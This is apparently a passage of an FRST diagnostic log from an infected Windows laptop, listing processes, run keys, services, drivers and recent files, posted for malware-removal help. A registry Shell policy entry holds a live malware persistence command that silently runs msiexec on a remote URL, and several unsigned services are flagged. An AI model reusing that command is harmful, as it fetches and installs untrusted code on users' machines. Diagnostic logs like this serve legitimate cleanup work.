(© pdfforge GmbH.) C:\ProgramData\pdfforge\PDF Architect 5 Manager\PDF Architect 5\Architect Manager.exe
() C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMEvent.exe
(Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMLockHandler.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMTray.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Akamai Technologies, Inc.) C:\Users\Vojtěch\AppData\Local\Akamai\netsession_win.exe
(Wargaming.net) C:\World_of_Tanks\WargamingGameUpdater.exe
(Akamai Technologies, Inc.) C:\Users\Vojtěch\AppData\Local\Akamai\netsession_win.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTAgent.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe
(VŠB-TU Ostrava) C:\Program Files (x86)\SafeQ\SafeQ_cli.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerEvent.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerWinMonitor.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\CSISYNCCLIENT.EXE
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2199840 2014-04-02] (NVIDIA Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13671640 2014-04-10] (Realtek Semiconductor)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-05-09] (AVAST Software)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [SafeQClient] => C:\Program Files (x86)\SafeQ\SafeQ_cli.exe [493568 2015-12-10] (VŠB-TU Ostrava)
HKLM-x32\...\Run: [ADSK DLMSession] => C:\Program Files (x86)\Common Files\Autodesk Shared\Autodesk Download Manager\DLMSession.exe [1627032 2015-01-28] (Autodesk, Inc.)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [529480 2016-02-24] (Autodesk Inc.)
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8944344 2016-09-28] (Piriform Ltd)
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Run: [Akamai NetSession Interface] => C:\Users\Vojtěch\AppData\Local\Akamai\netsession_win.exe [4691384 2015-09-10] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Run: [World of Tanks] => "E:\World_of_Tanks\WargamingGameUpdater.exe"
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Run: [World of Tanks (1)] => C:\World_of_Tanks\WargamingGameUpdater.exe [3135752 2017-02-28] (Wargaming.net)
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4701888 2017-02-07] (Disc Soft Ltd)
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\RunOnce: [Uninstall C:\Users\Vojtěch\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Vojtěch\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64"
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.ltdmsjq.com/?data=zDlkMj1L ... w5OWQSRH== /q
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Policies\Explorer: []
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-05-09] (AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-05-09] (AVAST Software)
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2014-02-07] (Autodesk, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2014-08-23]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{8F663C73-0024-4F37-9D83-EC9EE20AACF2}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{CD1B489B-823E-4F1E-906F-D96452103C06}: [DhcpNameServer] 158.196.0.53 158.196.99.166

Internet Explorer:
==================
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://acer13.msn.com/?pc=ACJB
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com/?pc=ACJB
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3751293310-3690691840-2036008392-1001 -> DefaultScope {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-3751293310-3690691840-2036008392-1001 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-05-26] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-04-06] (AVAST Software)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-05-26] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2017-05-25] (Microsoft Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-06] (AVAST Software)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-05-25] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-05-25] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-05-25] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-05-25] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-05-25] (Microsoft Corporation)

FireFox:
========
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-05-25] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-05-25] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2013-08-06] ()

Chrome:
=======
CHR DefaultSearchURL: Default -> hxxp://www.mystarting123.com/search/index.php? ... earchTerms}
CHR DefaultSearchKeyword: Default -> mystarting123
CHR Profile: C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default [2017-06-03]
CHR Extension: (Avast SafePrice) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2017-06-03]
CHR Extension: (Avast Online Security) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2017-06-03]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-06-03]
CHR Extension: (Chrome Media Router) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-06-03]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [1145928 2016-02-24] (Autodesk Inc.)
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7346208 2017-05-09] (AVAST Software s.r.o.)
R2 Autodesk Content Service; C:\Program Files (x86)\Autodesk\Content Service\Connect.Service.ContentService.exe [31192 2014-02-07] (Autodesk, Inc.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [263304 2017-05-09] (AVAST Software)
S2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2013-11-14] (Broadcom Corporation.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [4122824 2017-05-14] (Microsoft Corporation)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1471168 2017-02-07] (Disc Soft Ltd)
R3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [2573032 2014-06-12] (Acer Incorporated)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [227904 2014-04-24] (WildTangent)
S2 glory; C:\Users\Vojtěch\AppData\Local\glory\glory.dll [909824 2017-06-01] (glory) [File not signed] <==== ATTENTION
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [282096 2014-03-21] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)
R2 LMSvc; C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe [466664 2014-06-10] (Acer Incorporate)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1617352 2014-04-02] (NVIDIA Corporation)
S3 PDF Architect 5; C:\Program Files\PDF Architect 5\ws.exe [2706824 2017-02-10] (pdfforge GmbH)
S3 PDF Architect 5 CrashHandler; C:\Program Files\PDF Architect 5\crash-handler-ws.exe [1048976 2017-02-10] (pdfforge GmbH)
R2 PDF Architect 5 Creator; C:\Program Files\PDF Architect 5\creator-ws.exe [856976 2017-02-10] (pdfforge GmbH)
R2 PDF Architect 5 Manager; C:\ProgramData\pdfforge\PDF Architect 5 Manager\PDF Architect 5\Architect Manager.exe [985904 2017-02-28] (© pdfforge GmbH.)
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [254512 2012-04-24] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation)
S2 BIT; C:\ProgramData\BIT\BIT.dll [X] <==== ATTENTION

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [311808 2017-05-09] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [190256 2017-05-09] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334576 2017-05-09] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [49016 2017-05-09] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-05-09] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [32600 2017-05-09] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [128648 2017-05-09] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-05-09] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-05-09] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1007160 2017-05-09] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [569192 2017-05-09] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [158880 2017-05-12] (AVAST Software)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-05-09] (AVAST Software)
R2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [310728 2017-05-31] ()
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [170712 2013-11-14] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7549616 2014-02-25] (Broadcom Corporation)
R3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30264 2017-05-31] (Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\drivers\dtliteusbbus.sys [47672 2017-05-31] (Disc Soft Ltd)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77376 2017-05-31] ()
R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [42696 2017-05-31] ()
R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21360 2013-07-18] (Acer Incorporated)
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [188312 2017-06-02] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [113592 2017-06-03] (Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [44960 2017-06-03] (Malwarebytes)
R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [252832 2017-06-03] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [93600 2017-06-03] (Malwarebytes)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)
R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [14680 2013-07-18] (Acer Incorporated)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [476888 2014-04-02] (Realsil Semiconductor Corporation)
S4 secdrv; C:\Windows\SysWow64\Drivers\secdrv.sys [163644 2017-05-20] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [File not signed]
R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [42736 2014-07-10] (Synaptics Incorporated)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-06-03 14:08 - 2017-06-03 14:09 - 00021654 _____ C:\Users\Vojtěch\Desktop\FRST.txt
2017-06-03 14:04 - 2017-06-03 14:04 - 00000000 ____D C:\Users\Vojtěch\Desktop\FRST-OlderVersion
2017-06-03 13:22 - 2017-06-03 13:22 - 00002807 _____ C:\Users\Vojtěch\Desktop\zoek plus jrt.rar
2017-06-03 13:17 - 2017-06-03 13:17 - 00001351 _____ C:\Users\Vojtěch\Desktop\JRTlog.txt
2017-06-03 13:16 - 2017-06-03 13:16 - 00001351 _____ C:\Users\Vojtěch\Desktop\JRT.txt
2017-06-03 13:12 - 2017-06-03 13:13 - 01663672 _____ (Malwarebytes) C:\Users\Vojtěch\Desktop\JRT.exe
2017-06-03 13:12 - 2017-06-03 13:12 - 00008654 _____ C:\Users\Vojtěch\Desktop\zoek-results.txt
2017-06-03 13:08 - 2017-06-03 12:45 - 00024064 _____ C:\Windows\zoek-delete.exe
2017-06-02 15:01 - 2017-06-02 15:01 - 00000299 _____ C:\Users\Vojtěch\Desktop\Nový textový dokument.txt
2017-06-02 14:42 - 2017-06-02 14:42 - 00003600 _____ C:\Windows\System32\Tasks\Milimili
2017-06-02 14:41 - 2017-06-02 14:41 - 00000000 ____D C:\Users\Vojtěch\AppData\Roaming\WinSAPSvc
2017-06-02 14:40 - 2017-06-02 14:40 - 00000000 ____D C:\Program Files (x86)\Default Company Name
2017-06-02 13:36 - 2017-06-03 13:19 - 00252832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-06-02 13:36 - 2017-06-03 13:19 - 00113592 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-06-02 13:36 - 2017-06-03 13:19 - 00093600 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-06-02 13:36 - 2017-06-03 13:19 - 00044960 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-06-02 13:36 - 2017-06-02 13:36 - 00188312 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2017-06-02 13:36 - 2017-06-02 13:36 - 00001887 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-06-02 13:36 - 2017-05-31 11:09 - 00077376 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-06-02 13:35 - 2017-06-02 13:35 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-06-02 13:35 - 2017-06-02 13:35 - 00000000 ____D C:\Program Files\Malwarebytes
2017-06-02 13:20 - 2017-06-02 13:22 - 64025992 _____ (Malwarebytes ) C:\Users\Vojtěch\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.139-1.0.2060.exe
2017-06-02 11:13 - 2017-06-02 11:13 - 00075062 _____ C:\Users\Vojtěch\Downloads\sjezdy-1.pdf
2017-06-02 09:34 - 2017-06-03 14:08 - 00000000 ____D C:\FRST
2017-06-02 09:30 - 2017-06-03 14:04 - 02433536 _____ (Farbar) C:\Users\Vojtěch\Desktop\FRST64.exe
2017-06-02 09:24 - 2017-06-03 13:05 - 00000000 ____D C:\zoek_backup
2017-06-02 09:18 - 2017-06-02 09:19 - 00000000 ____D C:\Users\Vojtěch\AppData\Roaming\Google Chrome Backup
2017-06-02 09:18 - 2017-06-02 09:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Parhelia Tools
2017-06-02 09:18 - 2017-06-02 09:18 - 00000000 ____D C:\Program Files (x86)\Google Chrome Backup
2017-06-02 09:17 - 2017-06-02 09:17 - 01309184 _____ C:\Users\Vojtěch\Desktop\zoek.exe
2017-06-02 09:17 - 2017-06-02 09:17 - 01145364 _____ (Parhelia Tools ) C:\Users\Vojtěch\Downloads\gcb.exe
2017-06-01 15:08 - 2017-06-01 15:08 - 04110280 _____ C:\Users\Vojtěch\Downloads\adwcleaner_6.047.exe
2017-06-01 15:07 - 2017-06-01 21:31 - 00000000 ____D C:\AdwCleaner
2017-06-01 14:50 - 2017-06-01 15:41 - 681891840 _____ C:\Users\Vojtěch\Downloads\01x04 Mrzaci, bastardi a zlomene veci.avi
2017-06-01 11:42 - 2017-06-01 12:37 - 701243392 _____ C:\Users\Vojtěch\Downloads\01x03 Lord Snih.avi
2017-06-01 10:44 - 2017-06-01 10:44 - 00008118 _____ C:\Users\Vojtěch\Desktop\cc_20170601_104441.reg
2017-06-01 10:38 - 2017-06-01 10:38 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\glory
2017-06-01 10:38 - 2017-06-01 10:38 - 00000000 ____D C:\Program Files (x86)\MIO
2017-06-01 10:36 - 2017-06-01 10:38 - 00000000 ____D C:\Program Files\MK
2017-05-31 22:01 - 2017-05-31 22:48 - 658640896 _____ C:\Users\Vojtěch\Downloads\01x02 Kralovska cesta.avi
2017-05-31 17:05 - 2017-06-01 10:41 - 00000000 ____D C:\Program Files (x86)\Zaklínač
2017-05-31 17:00 - 2017-05-31 17:00 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\Disc_Soft_Ltd
2017-05-31 16:59 - 2017-05-31 16:59 - 00000000 ____D C:\Users\Public\Documents\Daemon Tools Images
2017-05-31 16:57 - 2017-06-01 10:44 - 00000000 ____D C:\Users\Vojtěch\AppData\Roaming\DAEMON Tools Lite
2017-05-31 16:57 - 2017-05-31 16:59 - 00000000 ____D C:\Program Files\DAEMON Tools Lite
2017-05-31 16:57 - 2017-05-31 16:57 - 00047672 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtliteusbbus.sys
2017-05-31 16:57 - 2017-05-31 16:57 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2017-05-31 16:57 - 2017-05-31 16:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite
2017-05-31 16:57 - 2017-05-31 16:57 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2017-05-31 16:47 - 2017-05-31 16:47 - 00310728 _____ C:\Windows\system32\Drivers\atksgt.sys
2017-05-31 16:47 - 2017-05-31 16:47 - 00042696 _____ C:\Windows\system32\Drivers\lirsgt.sys
2017-05-31 16:34 - 2017-05-31 16:34 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\Software602
2017-05-31 16:20 - 2017-05-31 16:21 - 00000000 ____D C:\Users\Vojtěch\Downloads\Nová složka
2017-05-29 10:36 - 2017-05-29 11:20 - 581858534 _____ C:\Users\Vojtěch\Downloads\01x01 Zima se blizi.avi
2017-05-23 13:41 - 2017-05-23 13:41 - 03781252 _____ C:\Users\Vojtěch\Downloads\TZB-ČÁST (1).pdf
2017-05-23 13:40 - 2017-05-23 13:41 - 24624656 _____ C:\Users\Vojtěch\Downloads\POZEMKO.pdf
2017-05-21 12:44 - 2017-05-21 12:44 - 00000165 ____H C:\Users\Vojtěch\Desktop\~$Vyúčtování SolarCell Svoboda.xlsx
2017-05-20 17:53 - 2017-05-20 17:53 - 00163644 _____ (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) C:\Windows\SysWOW64\Drivers\SECDRV.SYS
2017-05-20 17:40 - 2017-05-20 17:40 - 00001902 _____ C:\Users\Public\Desktop\Call of Duty(R) 2 Singleplayer.lnk
2017-05-20 17:40 - 2017-05-20 17:40 - 00001902 _____ C:\Users\Public\Desktop\Call of Duty(R) 2 Multiplayer.lnk
2017-05-20 17:40 - 2017-05-20 17:40 - 00000293 _____ C:\Windows\game.ini
2017-05-20 17:40 - 2017-05-20 17:40 - 00000000 __SHD C:\Windows\ftpcache
2017-05-20 17:40 - 2017-05-20 17:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Activision
2017-05-20 17:36 - 2017-05-20 17:36 - 00000000 ____D C:\Program Files (x86)\Activision
2017-05-20 17:33 - 2017-05-20 17:33 - 00000000 ___HD C:\$AV_ASW
